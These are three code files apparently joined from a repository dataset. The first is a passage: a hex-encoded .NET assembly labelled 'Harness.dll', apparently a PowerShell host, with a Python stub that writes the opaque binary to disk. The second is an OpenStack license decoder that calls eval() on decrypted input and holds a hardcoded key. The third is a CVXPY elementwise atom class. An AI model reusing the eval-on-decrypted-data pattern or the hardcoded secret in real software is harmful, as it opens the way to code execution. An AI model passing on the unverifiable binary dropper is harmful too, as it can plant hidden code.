6900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00005552006500610064004c0069006e0065004100730053006500630075007200650053007400720069006e00670020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004946006c0075007300680049006e0070007500740042007500660066006500720020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004b47006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e0000414b006500790041007600610069006c00610062006c00650020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00003752006500610064004b006500790020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004f5300630072006f006c006c0042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e00740065006400004b53006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004953006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640000000000e88faf9bcd6a9141b5e9f123d25117440008b77a5c561934e0890831bf3856ad364e3503061215030612190206020206080306120c0306121d0306122103061225032000010320000204200101020320000804200101080400010e0e0420001219042001020e042001010e062002011c12290328000203280008030612080306112d03061210052001011208042000112d0320000e0420001231042000120d0420001235042800112d0328000e0428001231042800120d04280012350306121408200301113911390e062002010a123d112003151241020e12450e0e15124901124d0c2004080e0e151249011251080c200612550e0e0e0e1159115d08200412550e0e0e0e04200012110420001261042800121103061165030611690306113902060e0420001139052001011139042000116505200101116504200011690520010111690c200114116d02000200001171062001117511790b200401117111691171116d072002011171116d0d200201116914116d02000200000428001139042800116504280011690400001225062001011280b9080002121d12091225062001011180c1030701020307010805070212080e042000121504000012210500001280cd0720030e1d0508080500020e1c1c050002020e0e0500020e0e0e0420010308072003081d05080812070d030e0e0e02021d050e0e0812211221020401000000090002011280e51180e9052001011d05072002011280ed0804000101080e070512191d051280ed1280f512191307071d051280ed1280f912191280f512191d0507151249011280fd14000215128105011281090e1015128105011280fd120704151249011280fd1512490112810902020520020e08080620011d0e1d030807040e1d0e1d030e040001020e05200112210e071512810d0112450715128111011229052002011c180a200101151281150112290520001281190a20001512810d0112811d081512810d0112811d0a20001512810d01128121081512810d011281210a20001512810d01128125081512810d011281250a20001512810d01128129081512810d0112812905200012812d0520001281310715124901128135052001130008092002011181391181391430020212813d1512810d011e001512810d011e01060a0212451245042000121d05200012814505200012814905200012814d0600030e0e0e0e0e07041512810d0112451281410e02092000151281050113000615124901124509200015128151011300071512815101124504200013001907051512810d011245151249011245124515128151011245020920001512815901130008151281510112811d0e070312811d151281510112811d020815128151011281210e07031281211512815101128121020815128151011281250e07031281251512815101128125020815128151011281290e0703128129151281510112812902040000112d040701112d0307010e0520020108080407011231040701120d05000012815d04070112350520011d050e072003011d0508080507021d050204070112110407011139040701116504070111690e0706116511691
1651165116511694701001a2e4e45544672616d65776f726b2c56657273696f6e3d76342e300100540e144672616d65776f726b446973706c61794e616d65102e4e4554204672616d65776f726b20341101000c486f73742050726f63657373000005010000000017010012436f7079726967687420c2a920203230313500002901002466353961636637662d306632362d343761312d386434322d61633266363130343234326200000c010007312e302e302e3000000801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f77730100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000586000007c02000000000000000000007c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004dc010000010053007400720069006e006700460069006c00650049006e0066006f000000b8010000010030003000300030003000340062003000000044000d000100460069006c0065004400650073006300720069007000740069006f006e000000000048006f00730074002000500072006f00630065007300730000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e003000000038000c00010049006e007400650072006e0061006c004e0061006d00650000004800610072006e006500730073002e0064006c006c0000004800120001004c006500670061006c0043006f007000790072006900670068007400000043006f0070007900720069006700680074002000a900200020003200300031003500000040000c0001004f0072006900670069006e0061006c00460069006c0065006e0061006d00650000004800610072006e006500730073002e0064006c006c000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000680401800100000000000000000000002e3f41565f636f6d5f6572726f7240400000000000000000680401800100000000000000000000002e3f41566261645f616c6c6f634073746440400000000000680401800100000000000000000000002e3f4156657863657074696f6e4073746440400000000000680401800100000000000000000000002e3f4156747970655f696e666f404000680401800100000000000000000000002e3f41566261645f657863657074696f6e407374644040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100000751000007067010090100000b31600007c670100c0160000081900006c68010010190000301900002c690100301900009119000034690100c0190000ce1900003c690100ce190000a91d000048690100a91d0000871e00006c690100901e0000132000007c6901003020000070200000706c010070200000ad200000706c0100b020000003210000a86c01001021000044210000b0690100602100007f210000b8690100802100004c220000706c01005422000075220000706c010088220000f1220000bc690100f42200002d230000a86c0100302300008f240000c469010090240000cd2400003c6a0100d0240000f0250000e4690100f025000033260000706c0100342600003e2700000c6a010040270000572700002c690100582700009527000080710100982700004e2800003c6a01005028000019290000b86a01001c290000482a00009c6a0100482a0000dc2a00004c6a0100dc2a00007d2b0000e06a0100802b0000d12b0000746a0100d42b0000172c0000706c0100182c0000762c0000a86c0100782c00008d2c00002c690100902c0000a52c00002c690100a82c0000da2c0000706c0100dc2c0000f72c0000706c0100f82c0000132d0000706c0100142d0000352e0000606a0100382e0000bf2e0000d06a0100c02e0000552f0000906c0100702f0000be2f0000f86a0100c02f000085300000006b010088300000a63000002c690100a8300000e1300000a86c0100003100002a330000106b0100bc33000005340000706c010008340000d9340000146b0100dc340000ce3500001c6b0100d83500003d3600003c6b0100403600005e36000034690100603600009b3600002c6901009c360000bc3600002c690100bc3600000a370000a86c01000c3700002c3700002c6901007c370000a9370000706c0100c8370000f2370000706c01000438000048380000a86c01004838000081380000a86c010084380000de380000506b0100e038000007390000706c01001c3900004f390000706c010058390000243b0000c86b0100383b00006b3c0000606b01006c3c0000a83c0000706c0100a83c0000cc3c0000706c0100cc3c00004e3d0000a86c0100503d0000123e0000946b0100143e0000933e0000706c0100943e0000b83e00002c690100b83e0000f93e0000706c0100fc3e0000123f0000706c0100143f00005a400000a86c01005c40000082400000706c0100944000002a410000706c01003841000083410000706c010084410000e4410000c86b0100e44100001d420000a86c010038420000cd430000dc6b0100d0430000f04300002c690100fc430000294700000c6c01002c4700009f4700003c6a0100a047000093480000546c0100944800005b4a00009c6a01005c4a00008d4b00003c6b0100904b00003c4c0000646c01003c4c0000304d0000506f0100304d00009d4d0000786c0100a04d0000114e0000846c0100844e0000af4e00002c690100b04e0000fc4e0000706c0100fc4e0000f6520000706c0100005300001f530000706c01002053000040530000706c010040530000bf530000906c0100c05300003a540000906c01003c540000bd540000906c0100c0540000f8540000a86c0100f854000030550000a86c01003055000011570000b46c0100145700004d5700002c69010050570000935700002c690100c4570000335a0000d06c0100505a0000b55f0000f86c0100b85f000026600000fc6d01002860000049600000706c01005c60000095600000a86c01009860000059610000a06d01005c61000010660000846d01001066000075680000e46d0100786800004f6900001c6e0100746900002a6a0000b86d01002c6a00007b6c0000506e01007c6c00007f6e0000fc6c0100806e0000d36e00002c690100d46e000066700000486d0100687000008c720000386e01008c720000b9730000906c0100bc730000e37300002c690100e47300000d740000706c01001c74000057740000a86c010060740000ec740000c86b0100ec7400000c750000a06e01000c750
0002b750000806e01002c750000497500002c6901004c750000697500002c6901006c750000cf750000706c0100e075000047760000c06e010048760000b4760000c46e0100b476000058780000e46e01005878000000790000706c01000079000024790000b069010024790000a279000034690100a4790000547d0000346f0100547d00004d7f0000006f0100507f0000478000001c6f010048800000a9810000506f0100ac8100007d820000686f010080820000b4830000806f0100bc83000052840000bc6901005c8400009c840000f86e0100a484000023850000bc6901003885000071850000a86c01007c850000dd850000706c0100f085000098860000986f010098860000dc860000a86c0100dc86000063870000c86b010064870000218800009c6f010024880000858800003c6a01002c890000c28a0000c86b0100688b0000dd8b0000cc6f0100e08b0000428c0000a86c0100448c00006c8c00002c6901006c8c0000e98c0000bc690100ec8c00007a8d0000c86b01007c8d00005d8f000060700100608f00001a900000ec6f01001c9000006092000010700100609200000e9500004070010060950000ad9500007c700100189600004b980000a07001007098000094980000d0700100a0980000b8980000d8700100c0980000c1980000dc700100d0980000d1980000e0700100d49800006c990000a86c01006c9900009c9900002c6901009c990000019a0000706c0100049a0000359a0000706c0100a89a0000219b0000e4700100389b00000b9c00003c6a01000c9c0000a69c0000a86c0100a89c00002d9d0000706c0100309d00009b9d0000706c0100b89d0000f89d00002c690100f89d00006ba00000f470010090a00000d0a0000010710100d8a000002da100002c69010030a10000aaa10000bc690100aca10000fea200001871010020a3000064a400002871010064a400002fa50000a86c010030a50000ffa500004471010000a60000c7a6000030710100d0a600009da7000070710100a0a7000057a800005871010064a800006ea900007871010070a90000dca9000080710100dca90000d6ad000078710100d8ad0000c4b0000098710100c4b000005ab10000887101005cb10000d2b20000d0710100d4b2000050b30000c071010050b30000dab30000906c0100dcb300000eb400002c69010010b400009fb40000f8710100f8b400001eb500002c69010020b500007fb500002c69010080b50000ccb50000706c0100ccb5000045b600003c6a010054b600003ab70000087201003cb70000e4b7000048720100e4b70000bfb8000070720100c0b8000007b900008072010008b900004bb90000bc6901004cb9000091b90000bc69010094b900004abf0000a07201004cbf000002c50000a072010004c5000065cd0000c472010068cd000040d80000e872010040d8000017d900000c73010018d90000f9d9000034730100fcd90000ede1000060730100f0e100006ae20000a86c01006ce20000d2e2000084730100f0e20000b7e30000a8730100b8e30000dae50000ac730100dce5000074e60000d473010074e600001ee70000c473010020e7000094e700002c690100c0e7000053e800003c6a010054e80000a5e9000000740100b0e9000009ea0000146b01000cea0000cfea000018740100d0ea00008aeb0000a86c01008ceb0000c3eb0000706c0100c4eb0000e4eb00002c690100e4eb00001fec0000b06901002cec0000bbec0000906c010068ed00008eed0000c46f01008eed0000d7ed0000c46f0100d7ed0000ebed0000c46f0100ebed000031ee0000946a010031ee00004aee0000c46f01004aee000063ee0000c46f010063ee000087ee0000c46f010087ee0000a2ee0000c46f0100a2ee000096ef0000c46f010096ef000014f000003c6d010014f000002cf00000c46f01002cf0000042f00000c46f010042f000006bf00000c46f01006bf0000084f00000c46f010084f00000a1f00000c46f0100a1f00000baf00000c46f0100baf00000d3f00000c46f0100e0f0000000f10000c46f010000f100001ef10000c46f01001ef1000046f10000c46f010046f100005ff10000c46f01005ff1000078f10000c46f010078f100008ff10000c46f01008ff10000a7f10000c46f0100a7f10000c0f10000c46f0100c0f10000d7f10000c46f0100000000000000000000000000000000000000000000000000000001001800000018000080000000000000000000000000000001000200000030000080000000000000000000000000000001000904000048000000601002007d010000000000000000000000000000000000003c3f786d6c2076657273696f6e3d27312e302720656e636f64696e673d275554462d3827207374616e64616c6f6e653d27796573273f3e0d0a3c617373656d626c7920786d6c6e733d2775726e3a736368656d61732d6d69
63726f736f66742d636f6d3a61736d2e763127206d616e696665737456657273696f6e3d27312e30273e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c656765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d276173496e766f6b6572272075694163636573733d2766616c736527202f3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a3c2f617373656d626c793e0d0a0000000000000000000000000000000000000000000000000000000000000000000000000001006000000098a2b0a2b8a2c0a2c8a2e0a2e8a2f0a248a350a358a360a360a468a470a478a480a488a490a498a4e8a8f8a808a918a928a938a948a958a968a978a988a998a9a8a9b8a9c8a9d8a9e8a9f8a908aa18aa28aa38aa48aa000000100100e000000050a458a460a468a450a858a860a868a840a948a950a958a960a968a970a978a980a988a990a998a9a0a9a8a9b0a9b8a9c0a9c8a9d0a9d8a9e0a9e8a9f0a9f8a900aa08aa10aa18aa20aa28aa30aa38aa40aa48aa50aa58aa60aa68aa70aa78aa80aa88aa90aa98aaa0aaa8aab0aab8aac0aac8aad0aad8aae0aae8aaf0aaf8aa00ab08ab10ab18ab20ab28ab30ab38ab40ab48ab50ab58ab60ab68ab70ab78ab80ab88ab90ab98aba0aba8abb0abb8abc0abc8abd0abd8abe0abe8abf0abf8ab00ac08ac10ac18ac20ac28ac30ac38ac40ac48ac50ac000000200100b4000000b8aac8aad8aae8aaf8aa08ab18ab28ab38ab48ab58ab68ab78ab88ab98aba8abb8abc8abd8abe8abf8ab08ac18ac28ac38ac48ac58ac68ac78ac88ac98aca8acb8acc8acd8ace8acf8ac08ad18ad28ad38ad48ad58ad68ad78ad88ad98ada8adb8adc8add8ade8adf8ad08ae18ae28ae38ae48ae58ae68ae78ae88ae98aea8aeb8aec8aed8aee8aef8ae08af18af28af38af48af58af68af78af88af98afa8afb8afc8afd8afe8aff8af0000003001000802000008a018a028a038a048a058a068a078a088a098a0a8a0b8a0c8a0d8a0e8a0f8a008a118a128a138a148a158a168a178a188a198a1a8a1b8a1c8a1d8a1e8a1f8a108a218a228a238a248a258a268a278a288a298a2a8a2b8a2c8a2d8a2e8a2f8a208a318a328a338a348a358a368a378a388a398a3a8a3b8a3c8a3d8a3e8a3f8a308a418a428a438a448a458a468a478a488a498a4a8a4b8a4c8a4d8a4e8a4f8a408a518a528a538a548a558a568a578a588a598a5a8a5b8a5c8a5d8a5e8a5f8a508a618a628a638a648a658a668a678a688a698a6a8a6b8a6c8a6d8a6e8a6f8a608a718a728a738a748a758a768a778a788a798a7a8a7b8a7c8a7d8a7e8a7f8a708a818a828a838a848a858a868a878a888a898a8a8a8b8a8c8a8d8a8e8a8f0a800a910a920a930a940a950a960a970a980a990a9a0a9b0a9c0a9d0a9e0a9f0a900aa10aa20aa30aa40aa50aa60aa70aa80aa90aaa0aab0aac0aad0aae0aaf0aa00ab10ab20ab30ab40ab50ab60ab70ab80ab90aba0abb0abc0abd0abe0abf0ab00ac10ac20ac30ac40ac50ac60ac70ac80ac90aca0acb0acc0acd0ace0acf0ac00ad10ad20ad30ad40ad50ad60ad70ad80ad90ada0adb0adc0add0ade0adf0ad00ae10ae20ae30ae40ae50ae60ae70ae80ae90aea0aeb0aec0aed0aee0aef0ae00af10af20af30af40af50af60af70af80af90afa0afb0afc0afd0afe0aff0af00400100f000000000a010a020a030a040a050a060a070a080a090a0a0a0b0a0c0a0d0a0e0a0f0a000a110a120a130a140a150a160a170a180a190a1a0a1b0a1c0a1d0a1e0a1f0a100a210a220a230a240a250a260a270a280a290a2a0a2b0a2c0a2d0a2e0a2f0a200a310a320a330a340a350a360a370a380a390a3a0a3b0a3c0a3d0a3e0a3f0a300a410a420a430a440a450a460a470a480a490a4a0a4b0a4c0a4d0a4e0a4f0a400a510a520a530a540a550a560a570a580a590a5a0a5b0a5c0a5d0a5e0a5f0a500a610a620a630a640a650a660a670a680a690a6a0a6b0a6c0a6d0a6e0a6f0a600a710a720a70000006001000c000000b8a4000000800100e800000018a030a238a240a248a250a258a260a268a270a278a2d0a4d8a4e0a4e8a4f0a4f8a400a508a510a518a520a528a530a538a540a548a550a558a560a568a570a578a580a588a590a598a5a0a5a8a5b0a5b8a5c0a5c8a5d0a5d8a5e0a5e8a5f0a5f8a500a608a610a618a620a630a638a640a648a650a658a660a668a670a678a680a688a690a698a6a0a6a8a6b0a6b8a6c0a6c8a6d0a6d8a6e0a6e8a6f0a6f8a600a708a710a718a720a
728a730a738a740a748a750a758a760a768a770a778a780a788a790a7d8a7f8a718a838a858a890a8a8a8b0a8b8a8c0a830ae40ae50ae009001003400000010a218a220a228a230a238a240a248a250a258a268a270a278a280a288a290a298a2a0a2b0a2b8a2c0a2c8a200d0010014000000e0a908aa30aa58aa78aa000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
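# Decode the embedded hex blob above and write it to the user-supplied path
# as a raw binary file.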
with open(input("Save as: "), "wb") as f:
f.write(bytearray.fromhex(raw_code))
|
mit
|
xuweiliang/Codelibrary
|
openstack_dashboard/api/authcode_back.py
|
1
|
2953
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
import base64
import hashlib
class AuthCode(object):
@classmethod
def code_init(cls, cipher):
try:
encrypted_data = getattr(cipher, 'encrypted_license')
encrypted_str = encrypted_data.strip()
decryption = None
if hasattr(cipher, 'system_uuid'):
                key, pwd = cipher.system_uuid.split(":")
                if getattr(cipher, 'disabled'):
                    decryption = cls.decode(encrypted_str, 'fr1e54b8t4n4m47')
                else:
                    decryption = cls.decode(encrypted_str, key)
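            # The decrypted payload is expected to be a Python literal
            # (e.g. a dict of license fields); eval() turns it back into an
            # object, and any failure falls through to the except below.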
return eval(decryption)
except Exception:
return None
@classmethod
def decode(cls, string, key, expiry=0):
try:
return cls._auth_code(string, 'DECODE', key, expiry)
        except Exception:
            return None
@staticmethod
def _md5(source_string):
return hashlib.md5(source_string).hexdigest()
@classmethod
def _auth_code(cls, input_string, operation='DECODE', key='', expiry=3600):
        rand_key_length = 4                      # length of the random key prefix (key_c)
        key = cls._md5(key)
        key_a = cls._md5(key[:16])               # drives the keystream (crypt_key)
        key_b = cls._md5(key[16:])               # drives the embedded integrity checksum
if rand_key_length:
if operation == 'DECODE':
key_c = input_string[:rand_key_length]
else:
key_c = cls._md5(str(time.time()))[-rand_key_length:]
else:
key_c = ''
crypt_key = key_a + cls._md5(key_a + key_c)
if operation == 'DECODE':
handled_string = base64.b64decode(input_string[rand_key_length:])
else:
                expiration_time = expiry + int(time.time()) if expiry else 0
handled_string = '%010d' % expiration_time + cls._md5(input_string + key_b)[:16] + input_string
rand_key = list()
for i in xrange(256):
rand_key.append(ord(crypt_key[i % len(crypt_key)]))
        # RC4-style key scheduling: build a 256-entry permutation (box)
        # seeded from the key-derived rand_key table.
        box = range(256)
        j = 0
        for i in xrange(256):
            j = (j + box[i] + rand_key[i]) % 256
            box[i], box[j] = box[j], box[i]
result = ''
a = 0
j = 0
        # RC4-style keystream generation: XOR each byte of handled_string
        # with a byte drawn from the evolving permutation.
        for i in xrange(len(handled_string)):
            a = (a + 1) % 256
            j = (j + box[a]) % 256
            box[a], box[j] = box[j], box[a]
            result += chr(ord(handled_string[i]) ^ box[(box[a] + box[j]) % 256])
if operation == 'DECODE':
if (int(result[:10]) == 0 or (int(result[:10]) - time.time() > 0)) and \
(result[10:26] == cls._md5(result[26:] + key_b)[:16]):
output_string = result[26:]
else:
output_string = ''
else:
output_string = key_c + base64.b64encode(result)
return output_string
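# --- Hedged usage sketch (not part of the original module) ---
# Round-trips a made-up plaintext through the ENCODE branch of _auth_code
# and back through decode(); the key and plaintext are hypothetical, and
# the snippet assumes the Python 2 semantics used above (str bytes, xrange,
# mutable range()).
if __name__ == '__main__':
    demo_key = 'example-secret'
    token = AuthCode._auth_code('hello', 'ENCODE', demo_key, expiry=0)
    assert AuthCode.decode(token, demo_key) == 'hello'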
|
apache-2.0
|
ashhher3/cvxpy
|
cvxpy/atoms/elementwise/elementwise.py
|
10
|
1354
|
"""
Copyright 2013 Steven Diamond
This file is part of CVXPY.
CVXPY is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CVXPY is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CVXPY. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import abc
from cvxpy.atoms.atom import Atom
import operator as op
if sys.version_info >= (3, 0):
from functools import reduce
class Elementwise(Atom):
""" Abstract base class for elementwise atoms. """
__metaclass__ = abc.ABCMeta
def shape_from_args(self):
"""Shape is the same as the sum of the arguments.
"""
return reduce(op.add, [arg._dcp_attr.shape for arg in self.args])
def validate_arguments(self):
"""
Verify that all the shapes are the same
or can be promoted.
"""
shape = self.args[0]._dcp_attr.shape
for arg in self.args[1:]:
shape = shape + arg._dcp_attr.shape
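# --- Hedged illustration (not part of CVXPY) ---
# Shows the reduce(op.add, ...) pattern used by shape_from_args with a
# stand-in shape class; the real cvxpy Shape addition additionally handles
# scalar promotion, which this toy version omits.
class _ToyShape(object):
    def __init__(self, rows, cols):
        self.size = (rows, cols)
    def __add__(self, other):
        if self.size != other.size:
            raise ValueError("Incompatible dimensions %s, %s"
                             % (self.size, other.size))
        return _ToyShape(*self.size)
if __name__ == '__main__':
    combined = reduce(op.add, [_ToyShape(2, 3), _ToyShape(2, 3)])
    print(combined.size)  # -> (2, 3)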
|
gpl-3.0
|